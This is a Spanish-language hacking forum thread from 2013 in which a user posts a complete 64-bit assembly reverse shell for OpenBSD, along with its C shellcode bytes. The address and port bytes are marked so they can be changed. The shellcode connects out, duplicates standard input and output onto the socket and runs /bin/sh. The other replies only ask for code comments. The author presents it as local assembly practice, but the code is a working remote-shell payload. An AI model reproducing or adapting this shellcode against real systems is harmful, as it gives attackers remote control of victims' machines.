elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  [!] Reverse shell Unix-like
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [!] Reverse shell Unix-like  (Leído 6,020 veces)
xv0


Desconectado Desconectado

Mensajes: 1.027



Ver Perfil
[!] Reverse shell Unix-like
« en: 11 Enero 2013, 14:41 pm »

Hola

Para poner en practica los conocimientos que voy adquiriendo en ASM, hice una pequeña reverse shell de 64bits.

Esta testeada en OpenBSD y en nivel local, no remoto, solo es para poner en practica mis conocimientos, eso lo dejo bien claro.

Código
  1. .section .text
  2. .globl _start
  3.  
  4. _start:
  5.  
  6. incb %al
  7. pushq %rax
  8. popq %rsi
  9. incb %al
  10. pushq %rax                      //socket
  11. popq %rdi
  12. orb $0x4, %al
  13. pushq %rax
  14. popq %rdx
  15. addb $0x5b, %al
  16. syscall
  17.  
  18. xchgq %rax, %rdi            //descriptor
  19.  
  20. movq $0x0100007f4dbc02ff, %rbx        //sockaddr_in
  21. pushq %rbx
  22.  
  23. movq %rsp, %rsi
  24. movb $0x10, %dl                   //connect
  25. orb $0x60, %al
  26. syscall
  27.  
  28. xorq %rsi, %rsi
  29.  
  30. C.0:
  31.  
  32. movb $0x5a, %al
  33. syscall
  34. incb %sil                             //dup2 0,1,2
  35. cmpb $0x03, %sil
  36.  
  37. loopne C.0
  38.  
  39. movq $0x68732f6e69622fff, %rbx
  40. shrq $0x8, %rbx
  41. pushq %rbx
  42. movq %rsp, %rdi
  43. xorb %al, %al                       //execve sh
  44. pushq %rax
  45. movq %rsp, %rsi
  46. xchgq %rax, %rdx
  47. addb $0x2b, %al
  48. syscall
  49.  
  50. xorb %al, %al
     

C:

Código
  1. "\xfe\xc0\x50\x5e\xfe\xc0\x50\x5f\x0c\x04\x50\x5a"
  2. "\x04\x5b\x0f\x05\x48\x97\x48\xbb\xff\x02"
  3. "\xbc\x4d"                  // puerto
  4. "\x7f\x00\x00\x01"         // direccion
  5. "\x53\x48\x89\xe6\xb2\x10\x0c\x60\x0f\x05\x48\x31"
  6. "\xf6\xb0\x5a\x0f\x05\x48\xff\xc6\x48\x83\xfe\x03"
  7. "\xe0\xf3\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68"
  8. "\x48\xc1\xeb\x08\x53\x48\x89\xe7\x30\xc0\x50\x48"
  9. "\x89\xe6\x48\x92\x04\x2b\x0f\x05\x30\xc0";

Cualquier pregrunta sobre el código no os cortéis.

Un saludo.
« Última modificación: 14 Enero 2013, 19:40 pm por cpu2 » En línea

0xDani


Desconectado Desconectado

Mensajes: 1.077



Ver Perfil
Re: [!] Reverse shell Unix-like
« Respuesta #1 en: 11 Enero 2013, 15:59 pm »

Vendria bien que le pusieses comentarios al codigo, para que lo podamos entender mejor.

Enhorabuena por terminar la reverse shell  ;-)

Saludos.
En línea

I keep searching for something that I never seem to find, but maybe I won't, because I left it all behind!

I code for $$$
Hago trabajos en C/C++
Contactar por PM
xv0


Desconectado Desconectado

Mensajes: 1.027



Ver Perfil
Re: [!] Reverse shell Unix-like
« Respuesta #2 en: 12 Enero 2013, 01:53 am »

Cual es la parte que no entiendes bien?

Un saludo.
En línea

ameise_1987

Desconectado Desconectado

Mensajes: 119



Ver Perfil
Re: [!] Reverse shell Unix-like
« Respuesta #3 en: 12 Enero 2013, 02:49 am »

de estas hay bastantes, si te piden que la comentes la idea es que sea legible para las personas que recién se inician, eso creo yo.

saludos y gracias por compartir!!.
En línea

firma retirada por insultar/cachondearse de (anelkaos) del staff.
xv0


Desconectado Desconectado

Mensajes: 1.027



Ver Perfil
Re: [!] Reverse shell Unix-like
« Respuesta #4 en: 14 Enero 2013, 16:19 pm »

Lo comentó línea por línea?

Un saludo.

P.D: También dejare el opcode para los de C.
En línea

jackgris

Desconectado Desconectado

Mensajes: 149



Ver Perfil
Re: [!] Reverse shell Unix-like
« Respuesta #5 en: 15 Enero 2013, 13:30 pm »

Este no es el caso, por no ser un código tan complicado, pero deberías comentarlo siempre, imagínate que realizas algo muy complejo sobre todo en ASM, y después de unos meses quieres retomar el código. Si no esta comentado, querrás tirar ese fuente a la basura jejeje
En línea

Falso Positivo

Desconectado Desconectado

Mensajes: 243



Ver Perfil WWW
Re: [!] Reverse shell Unix-like
« Respuesta #6 en: 15 Enero 2013, 16:36 pm »

Este no es el caso, por no ser un código tan complicado, pero deberías comentarlo siempre, imagínate que realizas algo muy complejo sobre todo en ASM, y después de unos meses quieres retomar el código. Si no esta comentado, querrás tirar ese fuente a la basura jejeje

eso tiene algo de realidad, pero una cosa es comentarlo para uno y otra orientada a personas que quieren aprender y empiezan por tratar de entender el funcionamiento de la rs
En línea

Don't worry, be hacked....
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Reverse Shell
Programación Visual Basic
cobein 9 5,375 Último mensaje 15 Septiembre 2010, 18:45 pm
por VanHan
Error en conexion de una shell reverse con netcat
Hacking
w4sp 2 3,869 Último mensaje 26 Junio 2020, 09:48 am
por w4sp
http, tcp reverse shell
Hacking
juliomob 5 4,806 Último mensaje 6 Noviembre 2020, 14:27 pm
por BloodSharp
Reverse shell a ip publica
Hacking
Panic0 3 3,454 Último mensaje 23 Febrero 2022, 13:55 pm
por Panic0
Reverse Shell Attacks for Absolute Bignners
Tutoriales - Documentación
ehn@ 0 952 Último mensaje 24 Noviembre 2023, 02:27 am
por ehn@
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines